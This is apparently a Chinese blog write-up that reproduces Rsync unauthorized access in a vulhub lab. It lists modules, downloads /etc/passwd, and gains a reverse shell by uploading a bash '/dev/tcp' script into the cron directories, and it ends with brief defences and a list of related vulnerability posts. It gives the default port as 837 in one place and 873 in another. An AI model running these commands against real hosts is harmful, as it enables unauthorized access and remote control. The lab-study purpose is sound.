1. 漏洞介绍及危害

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。

2. 漏洞复现

Rsync相关环境利用vulhub进行复现,vulhub安装教程请自行百度

cd /vulhub/rsync/common
docker-compose up -d

3. 未授权访问

#rsync rsync://{target_ip}/rsync rsync://192.168.2.85/
rsync rsync://192.168.2.85/src

4. 任意文件下载

rsync rsync://192.168.2.85/src/etc/passwd ./

成功下载/etc/passwd

5. 反弹shell

# 下载crontab配置文件
rsync rsync://192.168.2.85:873/src/etc/crontab ./该环境crontab中
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
表示每小时的第17分钟执行run-parts --report /etc/cron.hourly

# 写入bash并赋权
vim nc
chmod 777#bash内容:#!/bin/bash
/bin/bash -i >& /dev/tcp/10.211.55.8/9999 0>&i# 最后将文件上传至/etc/cron.hourly
rsync -av nc rsync://192.168.2.85:873/src/etc/cron.hourly

我这里上传的位置非:rsync://192.168.2.85:873/src/etc/cron.hourly

而是:rsync://192.168.2.85:873/src/var/spool/cron/crontabs/当前用户

# kali本地监听9999端口
nc -lvnp 9999

每小时第十七分钟运行我们上传的bash脚本,所以反弹shell需要等待

成功反弹shell

6. 防护措施

  • 账户认证:正确配置认证用户名及密码。
  • 权限控制:使用合理的权限。
  • 网络访问控制:控制接入源ip。
  • 数据加密传输等

Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)相关推荐

  1. Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)

    Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能 ...

  2. MongoDB未授权访问漏洞记录(端口:27017,37017)

    一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...

  3. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  4. Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)

    一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...

  5. CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败

    复现exp失败 漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript ...

  6. jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)

    一.漏洞描述 未授权访问管理控制台,可以通过脚本命令行执行系统命令.通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件. 二.漏洞环境搭建 ...

  7. Memcached未授权访问漏洞记录(CVE-2013-7239、危害级别全版本、端口:11211)

    Memcached介绍 Memcached是一个自由开源的,高性能,分布式内存对象缓存系统. Memcached是以LiveJournal旗下Danga Interactive公司的Brad Fitz ...

  8. Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)

    漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以 ...

  9. ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)

    漏洞简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件.它是一个为分布式应用提供一致性服务的软件 ...

最新文章

  1. 汇编--两种过程定义的方式,调用方式。
  2. Git rebase 和 Git merge 的区别,你知道吗?
  3. C++虚基类成员可见性
  4. PHP中两种包含文件方式、三种注释风格、四种标记风格
  5. 台达s1变频器参数表_各大品牌变频器万能密码汇总
  6. 基于JAVA+SpringMVC+Mybatis+MYSQL的球鞋购物系统
  7. 为什么这几年餐饮创业突然火起来了?
  8. APACHE局域网配置域名访问
  9. 剑指offer -- 反转链表
  10. php读取mssql中文乱码,PHP读取mssql json数据中文乱码的解决办法
  11. 审计工作存在的难点和问题_浅谈审计整改工作存在的困难及对策
  12. 我的世界服务器ess配置信息,我的世界有哪些ess指令_ess指令大全_3DM网游
  13. java六个必须理解的问题+java学习方法
  14. 数画-AI绘画-免费的人工智能AI绘画网站
  15. oracle乘法运算,乘法运算
  16. Oracle函数的确定性
  17. 求组合数(不同类型的组合数C++)
  18. 社区发现-Fast Unfolding
  19. perl中our的用法
  20. python3的变量和数据类型

热门文章

  1. 国科大生命科学学院华大专项-孙海汐导师课题组专访:去伪存真的过程一定不是一帆风顺的...
  2. 《细胞》突破性成果!北京林业大学钮世辉等解开“中国松”基因密码
  3. 马上开课 | 临床基因组学数据分析实战助力解析Case,快速发表文章
  4. 窗函数性能分析——MATLAB
  5. 美图秀秀 Mac版终于上线 关于美图秀秀 Mac版初体验
  6. 1.9编程基础之顺序查找 01查找特定的值
  7. 【php-laravel框架】第二节:laravel常用的扩展包汇总及安装教程
  8. Python | threading01 - 创建两个同时运行的子线程
  9. 计算机网络课程设计之基于 IP 多播的网络会议程序
  10. python内置的数据结构_Python内置数据结构